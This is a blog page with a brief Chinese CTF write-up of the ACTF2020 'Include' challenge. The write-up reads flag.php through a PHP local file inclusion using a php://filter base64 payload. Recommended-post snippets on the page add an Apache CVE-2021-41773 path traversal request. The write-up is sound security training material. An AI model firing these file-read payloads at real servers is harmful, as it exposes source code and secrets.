五、[ACTF2020 新生赛]Include

最新推荐文章于 2024-03-13 14:53:03 发布
最新推荐文章于 2024-03-13 14:53:03 发布
阅读量223 收藏
点赞数
分类专栏: BUUOJ_Web_Writeup 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xiyuer_/article/details/121748836
版权

1.打开题目
在这里插入图片描述

点击 tips,跳转->
在这里插入图片描述

文件包含,想办法得到文件源码。
2.题目分析
用到PHP伪协议
在这里插入图片描述

payload:
http://364c5e69-6889-4c41-a16a-29a949f51006.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php
在这里插入图片描述
3.获取flag
Base-64解码
在这里插入图片描述

囍语儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
文件导出 Java_java实现文件导出和下载方法
weixin_35688434的博客
02-22 732
package com.chinalife.contract.common.util;import java.util.List;import java.io.BufferedInputStream;import java.io.File;import java.io.FileInputStream;import java.io.OutputStream;import java.net.URL;i...
简单方法h5唤醒app
wilL-my的博客
06-06 3491
https://www.npmjs.com/package/callapp-lib https://www.npmjs.com/package/web-launch-app
2021-10-25
weixin_57848462的博客
10-25 101
@FeignClient注解中fallbackFactory属性的作用是什么?如何使用这个属性.? 在FeignClient中,我们通过制定fallbackFactory,可以在服务不可用时自动调用fallbackFactory制定的处理方法。 类似aop: package com.cy.consumer.Service; import feign.hystrix.FallbackFactory; import org.springframework.stereotype.Component; /**
2021-07-15
weixin_44294488的博客
07-15 318
在这里插入代码片 ```package com.example.vitul_program; import androidx.appcompat.app.AppCompatActivity; import android.graphics.Color; import android.os.Bundle; import android.support.v4.app.INotificationSideChannel; import android.util.Log; import android.view.
[每日一题][GFCTF 2021]Baby_Web
Sapphire037的博客
11-26 1257
前言 坚持。复现平台https://www.ctfer.vip/ 过程 题目标签写了CVE-2021-41773,路径穿越漏洞,进入环境首先看源码 <h1>Welcome To GFCTF 12th!!</h1> <!--源码藏在上层目录xxx.php.txt里面,但你怎么才能看到它呢?--> 网上找payload,bp发包 GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/var/www/index.php.txt HTTP/1.1 Hos
[ACTF2020 新生]Include1
m0_62959190的博客
03-13 392
进入靶场F12跳转到file=flag.phpurl地址存在参数构造pyload:?
[ACTF2020 新生]Include
weixin_53150482的博客
06-12 574
ACTF2020 新生
[ACTF2020 新生] Include1
旺仔Sec&blog
11-04 852
[ACTF2020 新生] Include1解析思路
【BUUCTF】ACTF2020 新生Include1 write up
GZWZ_的博客
03-30 3002
鉴于前几篇wp写的有些过于小白,我以后会改的┭┮﹏┭┮(web本就逆天,死在路上很正常)!
【BUUCTF】[ACTF2020 新生]Include1
weixin_61970418的博客
12-09 469
我们利用php伪协议中的php://filter进行读取flag.php并进行base64编码输出,否则会被当做php代码执行,而被隐藏,完整代码为。会输出一段base64编码,任意选择方式进行解码即可,我刚好开着burp,用burp中的解码器进行解码,就得到了flag。出现了一句话,Can you find the flag?,url也出现了变化,出现了?右键页面源代码,并没有出现flag。打开靶机,只有一个超链,点击。
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
MATLAB(Matrix Laboratory)是一种强大的数学计算软件,广泛应用于工程计算、数据分析、算法开发和图形化界面构建等领域。本资源“matlab的90个实例.rar”提供了MATLAB的基础知识,通过90个实例帮助初学者掌握其...
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方是一种创新的LED显示技术,它通过三维立体排列的LED灯珠,形成一个透明、可编程的灯光展示装置。这种技术广泛应用于艺术展览、舞台效果、广告展示等领域,因其独特的视觉效果和高度的可定制性而备受青睐。...
OGSM绩效管理培训材料双份资料.pptx
07-12
OGSM绩效管理培训材料双份资料.pptx
CAD机械设计项单选题样题.docx
07-12
CAD机械设计项单选题样题
100款古风PPT (79).pptx
最新发布
07-12
【ppt素材】工作总结、商业计划书、述职报告、读书分享、家长会、主题班会、端午节、期末、夏至、中国风、卡通、小清新、岗位竞聘、公司介绍、读书分享、安全教育、文明礼仪、儿童故事、绘本、防溺水、夏季安全、科技风、商务、炫酷、企业培训、自我介绍、产品介绍、师德师风、班主任培训、神话故事、巴黎奥运会、世界献血者日、防范非法集资、3D快闪、毛玻璃、人工智能等等各种样式的ppt素材风格。 设计模板、图片素材、PPT模板、视频素材、办公文档、小报模板、表格模板、音效配乐、字体库。 广告设计:海报,易拉宝,展板,宣传单,宣传栏,画册,邀请函,优惠券,贺卡,文化墙,标语,制度,名片,舞台背景,广告牌,证书,明信片,菜单,折页,封面,节目单,门头,美陈,拱门,展架等。 电商设计:主图,直通车,详情页,PC端首页,移动端首页,钻展,优惠券,促销标签,店招,店铺公告等。 图片素材:PNG素材,背景素材,矢量素材,插画,元素,艺术字,UI设计等。 视频素材:AE模板,会声会影,PR模板,视频背景,实拍短片,音效配乐。 办公文档:工作汇报,毕业答辩,企业介绍,总结计划,教学课件,求职简历等PPT/WORD模板。
搭建zookeeper
07-12
搭建zookeeper
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值